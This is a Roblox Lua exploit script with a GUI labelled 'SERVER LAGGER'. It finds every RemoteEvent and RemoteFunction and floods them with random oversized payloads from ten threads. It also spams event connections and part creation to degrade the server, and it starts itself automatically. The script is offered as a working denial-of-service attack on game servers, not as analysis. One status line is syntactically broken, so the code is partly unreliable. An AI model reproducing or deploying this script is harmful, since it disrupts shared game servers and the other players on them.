local Players = game:GetService("Players")
local RS = game:GetService("ReplicatedStorage")
local lp = Players.LocalPlayer
local sg = Instance.new("ScreenGui")
sg.Parent = game.CoreGui
local mf = Instance.new("Frame")
mf.Parent = sg
mf.Size = UDim2.new(0,250,0,150)
mf.Position = UDim2.new(0.5,-125,0.5,-75)
mf.BackgroundColor3 = Color3.new(0.1,0.1,0.1)
mf.Active = true
mf.Draggable = true
local tl = Instance.new("TextLabel")
tl.Parent = mf
tl.Size = UDim2.new(1,0,0,30)
tl.BackgroundColor3 = Color3.new(0.2,0,0)
tl.Text = "SERVER LAGGER"
tl.TextColor3 = Color3.new(1,0.5,0.5)
tl.Font = Enum.Font.Code
local st = Instance.new("TextLabel")
st.Parent = mf
st.Position = UDim2.new(0,10,0,35)
st.Size = UDim2.new(1,-20,0,40)
st.BackgroundTransparency = 1
st.Text = "READY"
st.TextColor3 = Color3.new(0.5,1,0.5)
st.Font = Enum.Font.Code
st.TextXAlignment = Enum.TextXAlignment.Left
local sb = Instance.new("TextButton")
sb.Parent = mf
sb.Position = UDim2.new(0.1,0,0,80)
sb.Size = UDim2.new(0.35,0,0,30)
sb.BackgroundColor3 = Color3.new(0.8,0.1,0.1)
sb.Text = "START"
sb.TextColor3 = Color3.new(1,1,1)
sb.Font = Enum.Font.Code
local eb = Instance.new("TextButton")
eb.Parent = mf
eb.Position = UDim2.new(0.55,0,0,80)
eb.Size = UDim2.new(0.35,0,0,30)
eb.BackgroundColor3 = Color3.new(0.2,0.2,0.2)
eb.Text = "STOP"
eb.TextColor3 = Color3.new(1,1,1)
eb.Font = Enum.Font.Code
local cb = Instance.new("TextButton")
cb.Parent = mf
cb.Position = UDim2.new(1,-25,0,5)
cb.Size = UDim2.new(0,20,0,20)
cb.BackgroundColor3 = Color3.new(0.8,0.1,0.1)
cb.Text = "X"
cb.TextColor3 = Color3.new(1,1,1)
cb.Font = Enum.Font.Code
local active = false
local threads = {}
local remotes = {events={},functions={}}
local function scan(f)
    for _,o in pairs(f:GetChildren()) do
        if o:IsA("RemoteEvent") then
            table.insert(remotes.events,o)
        elseif o:IsA("RemoteFunction") then
            table.insert(remotes.functions,o)
        end
        scan(o)
    end
end
scan(RS)
scan(workspace)
scan(game.ServerScriptService)
scan(game.ServerStorage)
st.Text = "REMOTES: "..#remotes.events+..#remotes.functions
local function pl()
    local t = math.random(1,4)
    if t==1 then return {string.rep("X",math.random(200,800))} end
    if t==2 then return {math.random(1,9999999)} end
    if t==3 then return {Vector3.new(math.random(),math.random(),math.random())} end
    local tb={}
    for i=1,math.random(10,50) do tb[i]=math.random() end
    return {tb}
end
local function start()
    if active then return end
    active=true
    sb.BackgroundColor3=Color3.new(0.1,0.8,0.1)
    sb.Text="RUNNING"
    st.Text="ATTACKING"
    local tc=10
    for i=1,tc do
        local th=task.spawn(function()
            while active do
                for _,r in pairs(remotes.events) do
                    if not active then break end
                    pcall(function() r:FireServer(unpack(pl())) end)
                end
                for _,r in pairs(remotes.functions) do
                    if not active then break end
                    pcall(function() r:InvokeServer(unpack(pl())) end)
                end
                task.wait()
            end
        end)
        table.insert(threads,th)
    end
    task.spawn(function()
        while active do
            for i=1,50 do
                pcall(function()
                    workspace.ChildAdded:Connect(function() end)
                    game.Lighting.Changed:Connect(function() end)
                end)
            end
            task.wait(0.1)
        end
    end)
    task.spawn(function()
        while active do
            for i=1,20 do
                pcall(function()
                    local p=Instance.new("Part")
                    p.Size=Vector3.new(10,10,10)
                    p.Position=Vector3.new(math.random(-200,200),math.random(10,100),math.random(-200,200))
                    p.Anchored=true
                    p.CanCollide=false
                    p.Parent=workspace
                    game.Debris:AddItem(p,5)
                end)
            end
            task.wait(0.05)
        end
    end)
end
local function stop()
    active=false
    for _,t in pairs(threads) do pcall(task.cancel,t) end
    threads={}
    sb.BackgroundColor3=Color3.new(0.8,0.1,0.1)
    sb.Text="START"
    st.Text="STOPPED"
end
sb.MouseButton1Click:Connect(start)
eb.MouseButton1Click:Connect(stop)
cb.MouseButton1Click:Connect(function() stop() sg:Destroy() end)
game.Players.PlayerRemoving:Connect(function(p) if p==lp then stop() pcall(function() sg:Destroy() end) end end)
task.wait(0.5)
start()
